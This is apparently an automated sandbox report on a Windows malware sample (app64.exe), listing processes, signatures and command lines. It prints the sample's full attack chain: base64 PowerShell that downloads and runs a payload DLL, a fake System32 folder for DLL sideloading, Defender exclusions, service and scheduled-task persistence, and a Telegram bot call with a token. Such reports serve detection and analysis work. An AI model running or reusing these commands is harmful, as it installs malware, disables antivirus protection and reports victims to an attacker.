Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83B00D0 34_2_00007FF8B83B00D0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83AA3A0 34_2_00007FF8B83AA3A0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B839B4E0 34_2_00007FF8B839B4E0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83B74F0 34_2_00007FF8B83B74F0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B839A4A4 34_2_00007FF8B839A4A4
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83C04A6 34_2_00007FF8B83C04A6
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B839F500 34_2_00007FF8B839F500
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83B8670 34_2_00007FF8B83B8670
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B83916F0 34_2_00007FF8B83916F0
Source: C:\Windows\System32\console_zero.exe Code function: 34_2_00007FF8B839C7B0 34_2_00007FF8B839C7B0
Found potential string decryption / allocating functions
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF8A935E0FE appears 63 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF8B8374D20 appears 32 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF8A935E278 appears 32 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF8A935E27E appears 39 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF8A935E1CA appears 1339 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF8A935E926 appears 36 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF8B8374A70 appears 364 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF8A935E8A2 appears 128 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF8A9318FD0 appears 105 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF8A935EDF0 appears 844 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF8A935E104 appears 461 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF8A935E10A appears 59 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF8B8374B60 appears 231 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF8A935E896 appears 148 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF8B8374BB0 appears 39 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF8A93083C0 appears 71 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF8B83AE2A0 appears 56 times
Source: C:\Windows\System32\svchost.exe Code function: String function: 00007FF8A9308330 appears 65 times
Source: C:\Windows\System32\console_zero.exe Code function: String function: 00007FF8B83AE230 appears 37 times
Source: C:\Windows\System32\console_zero.exe Code function: String function: 00007FF8B8374B60 appears 330 times
Source: C:\Windows\System32\console_zero.exe Code function: String function: 00007FF8B8374D20 appears 44 times
Source: C:\Windows\System32\console_zero.exe Code function: String function: 00007FF8B83B3D10 appears 31 times
Source: C:\Windows\System32\console_zero.exe Code function: String function: 00007FF8B8394EB0 appears 39 times
Source: C:\Windows\System32\console_zero.exe Code function: String function: 00007FF747103700 appears 97 times
Source: C:\Windows\System32\console_zero.exe Code function: String function: 00007FF8B8394D90 appears 42 times
Source: C:\Windows\System32\console_zero.exe Code function: String function: 00007FF8B8374BB0 appears 52 times
Source: C:\Windows\System32\console_zero.exe Code function: String function: 00007FF8B8374A70 appears 478 times
Source: C:\Windows\System32\console_zero.exe Code function: String function: 00007FF8B83AE2A0 appears 83 times
Source: C:\Windows\System32\console_zero.exe Code function: String function: 00007FF8B83A46D0 appears 45 times
PE file contains more sections than normal
Source: pyld.dll.3.dr Static PE information: Number of sections : 11 > 10
Source: libwinpthread-1.dll.13.dr Static PE information: Number of sections : 12 > 10
Source: libintl-9.dll.13.dr Static PE information: Number of sections : 20 > 10
Source: libiconv-2.dll.13.dr Static PE information: Number of sections : 20 > 10
Uses reg.exe to modify the Windows registry
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f
Yara signature match
Source: Process Memory Space: powershell.exe PID: 2124, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6620, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.evad.winEXE@89/48@10/8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\pyld.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1888:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2460:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:368:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4748:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3424:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6204:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1412:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6716:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3848:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gegny5yv.va2.ps1 Jump to behavior
Source: app64.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\app64.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: app64.exe ReversingLabs: Detection: 26%
Source: svchost.exe String found in binary or memory: -start
Source: svchost.exe String found in binary or memory: -addr
Source: svchost.exe String found in binary or memory: ../../gettext-runtime/intl/loadmsgcat.c
Source: unknown Process created: C:\Users\user\Desktop\app64.exe "C:\Users\user\Desktop\app64.exe"
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c move /y C:\Users\Public\pyld.dll "C:\Windows \System32\printui.dll"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f && sc start x590769
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start x590769
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k DcomLaunch
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\console_zero.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: unknown Process created: C:\Windows\System32\console_zero.exe C:\Windows\System32\console_zero.exe
Source: C:\Windows\System32\console_zero.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 14 /nobreak
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\usvcldr64.dat"
Source: C:\Users\user\Desktop\app64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\app64.exe Process created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
Source: C:\Users\user\Desktop\app64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c mkdir "\\?\C:\Windows \System32" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c move /y C:\Users\Public\pyld.dll "C:\Windows \System32\printui.dll" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32" Jump to behavior
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;" Jump to behavior
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';" Jump to behavior
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f && sc start x590769 Jump to behavior
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe" Jump to behavior
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});" Jump to behavior
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \" Jump to behavior
